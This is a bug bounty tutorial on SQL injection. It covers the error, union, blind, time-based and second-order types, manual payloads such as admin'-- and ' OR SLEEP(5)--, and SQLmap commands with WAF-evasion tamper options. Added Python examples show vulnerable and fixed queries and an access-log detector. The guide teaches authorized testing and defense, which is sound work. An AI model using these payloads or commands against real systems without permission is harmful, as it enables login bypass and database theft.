
SQL Injection (SQLi): The Ultimate 2026 Bug Bounty Guide Find Exploit & Report Like a Pro

By xploitzone
April 12, 2026 6:49 PM

What is SQL injection, what are its types and how do you find it in a bug bounty? This complete guide covers everything from Error-Based, Blind and Time-Based SQLi to SQLmap, Burp Suite and real-world examples.

What is SQL Injection?

If you want to get serious about bug bounty, SQL Injection, often referred to as SQLi, should be your top priority. It's not just an old technique that no longer works. Even in 2026 it's ranked number 3 on the OWASP Top 10 list, and high and critical severity reports for this vulnerability are submitted to bug bounty programs daily. Companies pay thousands of dollars for a single SQLi vulnerability, and one researcher earned $2,000 for just one SQL injection bug.

SQL stands for Structured Query Language. Whenever you log in to a website, search for something, or fill out a form, there is a database working behind the scenes, storing and retrieving the data using SQL. For example, a simple login query might look something like this:

SELECT * FROM users WHERE username = 'ali' AND password = '1234';

This query asks the database to find a user with the username ali and the password 1234. Now, if the developer has not secured this query properly, an attacker can inject his own SQL code into it, and the database starts doing what the attacker wants rather than what the developer intended.

Why is SQL Injection So Dangerous?

With just one successful SQLi vulnerability an attacker can dump the entire database, bypass login without a password, delete or modify data and, in some cases, even run operating-system-level commands. As a real-world example, in 2019 SQLi was found in the search bar of an e-commerce website, and through it the credit card details and personal data of 4 million users were leaked overnight. This is why companies take this vulnerability very seriously and offer huge bounties.

Types of SQL Injection

SQL injection isn't just one technique; to find it effectively you'll need to understand the different types.

1. Error-Based SQL Injection

This is the simplest and easiest type. Here the application displays database errors directly on the screen. When you type a single quote ( ' ) and get a MySQL or MSSQL error like "You have an error in your SQL syntax", you know you are in the right place. The error can reveal the database name, version and even the table structure. This is the fastest type to find and confirm in a bug bounty.

2. UNION-Based SQL Injection

Here the attacker uses SQL's UNION operator to extract data from other tables. For example, if the original query fetches data from the products table, the attacker can pull data from the users table along with it through UNION. For this to work the number of columns and their data types must match exactly, otherwise the query fails. It takes some practice but is a very powerful technique.

3. Boolean-Based Blind SQL Injection

This is useful when the application shows no error but its response differs depending on the injected condition. For example, if you append AND 1=1 the page loads normally, but with AND 1=2 the page is blank or shows a different message. That means the application is evaluating the SQL condition and the response changes with it, which is a clear sign of SQL injection. With this technique you can extract data from the database character by character by asking yes/no questions.

4. Time-Based Blind SQL Injection

This is the stealthiest technique. There is no error and no visible difference in the response, but you send a payload that makes the database pause the server for a few seconds. If the response is delayed by 5 seconds after sending the payload SLEEP(5), SQL injection is confirmed. This technique is found a lot in production systems because developers hide errors but cannot hide the timing. Recently a real bug bounty writeup published on infosecwriteups showed how time-based blind SQLi was found in a newsletter form by comparing the timing for each character.

5. Out-of-Band SQL Injection

This is the most advanced type. Here the database itself makes a request to an external server, such as a DNS or HTTP call. This is useful when there are neither errors nor timing differences to work with. Burp Suite Collaborator or an Interact tool is used for this. It is not common, but where it is found its impact is significant.

6. Second-Order SQL Injection

This is another tricky type that many hunters miss. Here the malicious input is first stored safely in the database but is later injected when it is used in another query. It can be found in registration forms, profile update pages or saved searches.
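The stored-then-reused path described above, as an added example that is not code from the original post. It assumes an in-memory SQLite database standing in for the real one; the table, the admin row and the payload username are all constructed here. Registration binds its parameter correctly, so the database is not the problem; the later profile update trusts the stored value and splices it into SQL, and that is where it runs.

```python
# Added example, not from the original post: a second-order SQL injection in miniature.
# The username is stored with a parameterized INSERT, so nothing happens at registration.
# A later profile update rebuilds a query from that stored value by concatenation, and
# that is where the stored text is executed. All rows are constructed; SQLite stands in
# for the real database.
import sqlite3
from typing import Callable


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, bio TEXT)")
    conn.execute("INSERT INTO users (username, bio) VALUES ('admin', 'site owner')")
    return conn


def register(conn: sqlite3.Connection, username: str) -> int:
    """First query: parameterized. The value is stored verbatim, quotes and all."""
    cur = conn.execute("INSERT INTO users (username, bio) VALUES (?, '')", (username,))
    return cur.lastrowid


def update_bio_vulnerable(conn: sqlite3.Connection, user_id: int, bio: str) -> None:
    """Second query: the username is read back from the database and spliced into SQL.
    Developers often skip binding here because the value 'came from our own database'."""
    (username,) = conn.execute(
        "SELECT username FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    conn.execute("UPDATE users SET bio = ? WHERE username = '" + username + "'", (bio,))


def update_bio_safe(conn: sqlite3.Connection, user_id: int, bio: str) -> None:
    """Same flow, but the stored value is bound as a parameter too."""
    (username,) = conn.execute(
        "SELECT username FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    conn.execute("UPDATE users SET bio = ? WHERE username = ?", (bio, username))


def admin_bio(conn: sqlite3.Connection) -> str:
    """What the admin's profile says after the scenario ran."""
    return conn.execute("SELECT bio FROM users WHERE username = 'admin'").fetchone()[0]


def run_scenario(update_bio: Callable[[sqlite3.Connection, int, str], None]) -> str:
    """Register a user whose name carries a payload, let them edit their own bio,
    and report what happened to the admin's bio."""
    conn = make_db()
    # Constructed payload: stored harmlessly at registration, it only widens the
    # WHERE clause of a later query that trusts the stored column.
    uid = register(conn, "mallory' OR username = 'admin")
    update_bio(conn, uid, "edited by another user")
    return admin_bio(conn)


if __name__ == "__main__":
    print("vulnerable:", run_scenario(update_bio_vulnerable))  # edited by another user
    print("safe:      ", run_scenario(update_bio_safe))        # site owner
```

The fix is the same rule applied consistently: a value read back from the database is still data and gets bound as a parameter, exactly like input that arrived over HTTP. When reviewing code, look for queries built from columns rather than from request parameters; those are the ones most scanners never reach, because the injection point and the input point are different requests.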

Identify SQL Injection Vulnerabilities in Bug Bounty Targets

SQLi isn't found everywhere, but there are specific places where it's found in abundance. Login forms are the most common target; test both the username and password fields. Search bars and filters also often contain SQLi because developers build search functionality quickly.

URL parameters like ?id=1, ?category=shoes and ?page=2 also need to be tested. Don't ignore ORDER BY fields, sorting dropdowns and hidden form fields. API endpoints that accept JSON should also be tested for SQLi. Very few people test this area, so it generates more bounties.

Perform Manual SQL Injection Testing

It's important to learn to test manually before using automated tools; this is what separates expert hunters from beginners. The first step is to launch Burp Suite, set up the proxy in your browser and browse to the target website so that every request is intercepted. Then send the parameters you want to test to Burp Repeater.

Try these simple payloads first:

Single quote: '  This triggers an error if the input is not properly sanitized.
Double quote: "  Some databases use double quotes for string literals.
Comment sequences: --, #, /*  These comment out the rest of the SQL query.
Time delay: ' OR SLEEP(5)--  for MySQL.


If you are testing whether a login can be bypassed, type admin'-- in the username field and anything in the password field. The query becomes:

SELECT * FROM users WHERE username = 'admin'--' AND password = ''

Everything after the double dash is commented out, so the password is not checked and you can log in as an admin if the web app is vulnerable.
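The bypass above, reproduced end to end as an added example (not code from the original post): a login check that builds its SQL by string concatenation, next to the parameterized version that closes the hole, both run against an in-memory SQLite database with a constructed user row. SQLite is assumed here because it ships with Python; the comment marker works the same way in the article's MySQL example, except that MySQL requires a space after the --.

```python
# Added example, not from the original post: the login bypass in miniature.
# An in-memory SQLite database stands in for the real one; the user row is constructed.
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding one constructed user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")  # constructed sample row
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The query from the article, built by string concatenation.

    Whatever the user typed becomes part of the SQL text, so a quote and a
    comment marker change the statement's structure instead of being compared
    as a value."""
    query = (
        "SELECT * FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The same check with a parameterized query.

    The driver sends the statement and the values separately, so the input is
    only ever compared against the column; it can never become SQL."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def probe_for_error(conn: sqlite3.Connection, username: str) -> Optional[str]:
    """Return the database error a given username raises in the vulnerable query,
    or None if it runs cleanly. This is the signal behind error-based SQLi, and the
    reason applications must log such errors server-side instead of echoing them."""
    try:
        vulnerable_login(conn, username, "x")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    # Legitimate use: both versions accept the right password and reject a wrong one.
    print(vulnerable_login(db, "admin", "s3cret"), safe_login(db, "admin", "s3cret"))  # True True
    print(vulnerable_login(db, "admin", "wrong"), safe_login(db, "admin", "wrong"))    # False False
    # The article's payload: the comment marker removes the password check...
    print(vulnerable_login(db, "admin'--", "anything"))  # True: logged in without the password
    # ...but a bound parameter is just a string that matches no username.
    print(safe_login(db, "admin'--", "anything"))        # False
    # A lone quote breaks the concatenated statement and surfaces a database error.
    print(probe_for_error(db, "'"))
```

Running the file prints both outcomes side by side. The parameterized version is the fix the report should recommend: escaping input by hand is fragile across database dialects, while bound parameters keep SQL and data separate by construction.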

SQLmap : Advanced Automation Tool for SQL Injection Testing

SQLmap is an open-source tool that automates SQL injection detection and exploitation. Be careful to run SQLmap only on targets within the bug bounty scope and never on any other site without permission. The basic command looks like this:

sqlmap -u "https://target.com/page?id=1" --dbs

This command tests the id parameter and, if injection succeeds, lists the databases. If you need to get past a WAF, use this command:

sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between --random-agent --level=3 --risk=2 --dbs

--level and --risk make SQLmap try more payloads. --random-agent uses a different browser identity on each request. --tamper scripts rewrite the payloads so the WAF does not recognise them.

But always remember that SQLmap is an automated tool. It can miss context-dependent injections that only manual testing finds. In a real writeup a researcher reported that the target had a double-quote injection which SQLmap failed on; manual testing caught it and resulted in a $2,000 bounty.

SQL Injection Testing with Burp Suite & Safe Practice Platforms

Burp Suite’s Intruder and Repeater are both useful for SQL injection testing. First send the target request to the Repeater and manually change the payloads as this gives precise control. If you want an automated scan, use Burp Scanner which can detect Boolean-based, time-based, UNION-based, and out-of-band SQL injections.

A useful trick in Burp Suite is to watch the response timing. If the response normally arrives in 200 ms but takes 5200 ms after a SLEEP payload, that is a clear indication.
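The same timing difference is visible from the defender's side: a 5 second outlier in the access log on a request that also carries SLEEP( is hard to mistake for a slow backend. Below, as an added example that is not from the original post or from Burp Suite, is a small scanner over a constructed access log (format assumed: client, method, request target, status, response time in milliseconds) that flags textual indicators for each injection type covered above and compares each response time against the per-path median.

```python
# Added example, not from the original post: the timing signal the article describes,
# turned into a defender's check over web-server access logs, together with string
# indicators for the other injection types. The log format (client, method, target,
# status, response time in ms) and every line below are constructed for this example.
import re
from collections import defaultdict, namedtuple
from statistics import median
from typing import List, Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log: one client probing ?id=, one ordinary visitor.
LOG_LINES = """\
203.0.113.5 GET /products?id=12 200 180
203.0.113.5 GET /products?id=12' 500 190
203.0.113.5 GET /products?id=12%20AND%201%3D1 200 185
203.0.113.5 GET /products?id=12%20AND%201%3D2 200 170
203.0.113.5 GET /products?id=12%20UNION%20SELECT%201,2,3 500 200
203.0.113.5 GET /products?id=12%27%20OR%20SLEEP(5)--%20 200 5210
198.51.100.7 GET /products?id=7 200 175
198.51.100.7 GET /search?q=red%20shoes 200 210
"""

# One textual indicator per injection type from the article. Each is a hint, not proof:
# a lone quote in particular appears in legitimate input (O'Brien) and needs weighting.
INDICATORS = {
    "quote": re.compile(r"""['"]"""),
    "boolean": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.IGNORECASE),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.IGNORECASE),
    "time": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.IGNORECASE),
    "comment": re.compile(r"--|#|/\*"),
}

Entry = namedtuple("Entry", "client method target status response_ms")
Finding = namedtuple("Finding", "client target indicators response_ms")


def parse_line(line: str) -> Optional[Entry]:
    """Parse one line of the constructed format; None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    client, method, target, status, ms = parts
    return Entry(client, method, target, int(status), int(ms))


def scan_log(text: str, slow_ms: int = 4000) -> List[Finding]:
    """Flag requests whose query-string values match an indicator, or whose response
    time exceeds the per-path median by slow_ms or more (the SLEEP(5) footprint)."""
    entries = [e for e in (parse_line(line) for line in text.splitlines()) if e]

    # Baseline latency per path, so a genuinely slow endpoint is not flagged on every hit.
    times_by_path = defaultdict(list)
    for e in entries:
        times_by_path[urlsplit(e.target).path].append(e.response_ms)
    baseline = {path: median(times) for path, times in times_by_path.items()}

    findings = []
    for e in entries:
        parts = urlsplit(e.target)
        hits = []
        # parse_qsl percent-decodes, so %27 and %20 are examined as ' and space.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits += [f"{name}:{ind}" for ind, rx in INDICATORS.items() if rx.search(value)]
        if e.response_ms - baseline[parts.path] >= slow_ms:
            hits.append("slow_response")
        if hits:
            findings.append(Finding(e.client, e.target, hits, e.response_ms))
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f"{f.client} {f.target} {f.response_ms}ms -> {', '.join(f.indicators)}")
```

On the constructed log this yields five findings, all from the probing client; the last one combines the quote, a time function, a comment marker and a response roughly 5 seconds above the path's median, which is the footprint of the SLEEP(5) check described above. Each indicator alone is noisy, so in production weight them and correlate by client address before alerting rather than paging on a single stray quote.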

It is illegal to test real websites without permission, so practice on these free platforms. PortSwigger Web Security Academy is completely free and has dedicated SQL injection labs that professional pentesters also use. DVWA (Damn Vulnerable Web Application) is a locally running vulnerable website that can be set up easily with Docker. SQL injection machines are also available on HackTheBox and TryHackMe, and OWASP WebGoat is another good option for beginners.

How to Write a Professional Bug Bounty Report

A good bug report decides whether you get a bounty or not. The report must contain the vulnerable URL and exact parameters, step-by-step reproduction steps that anyone can follow, a clear PoC (Proof of Concept) confirming that the vulnerability is real, the impact if an attacker exploits it, and a suggested CVSS score.

One thing is very important: don't expose real user data in the PoC. Just prove that the vulnerability exists. For example, confirm the SQLi with a time delay and take a screenshot. Don't exploit it any further than that.

Final Thoughts

SQL Injection is a living and breathing vulnerability even in 2026. It's not only found in legacy systems; it's also found in modern applications because a developer overlooked an endpoint or some old piece of code hasn't been updated. In bug bounties it consistently rates at high and critical severity, meaning more bounties and more recognition. Take it seriously, solve the labs on PortSwigger Academy, and keep writing writeups on your blog. This is the way to become a successful bug bounty hunter.

xploitzone

Exploring the world of cybersecurity through in-depth analysis of vulnerabilities, data breaches and emerging threats. Delivering real insights, technical breakdowns and bug bounty discoveries for security enthusiasts and researchers.
